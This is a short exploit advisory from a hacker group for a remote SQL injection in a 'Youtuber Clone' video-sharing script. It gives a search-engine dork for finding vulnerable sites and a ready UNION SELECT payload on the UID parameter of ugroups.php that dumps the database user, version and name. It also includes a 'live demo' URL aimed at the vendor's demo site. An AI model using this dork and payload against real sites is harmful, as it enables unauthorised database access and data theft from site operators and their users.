|___________________________________________________| | | Youtuber Clone (UID) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | | script : http://www.greatclone.com/product_info.php?cPath=30&products_id=86 | | DorK : "Everyone should be on TV! Now you can upload 2 TV" | |___________________________________________________| Exploit: www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15-- L!VE DEMO: : http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15-- ____________________________( Greetz )____________________________ | | tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke | | Iraqihack | FAHD | mos_chori | Silic0n | |_________________________________________________________________ Im IRAQi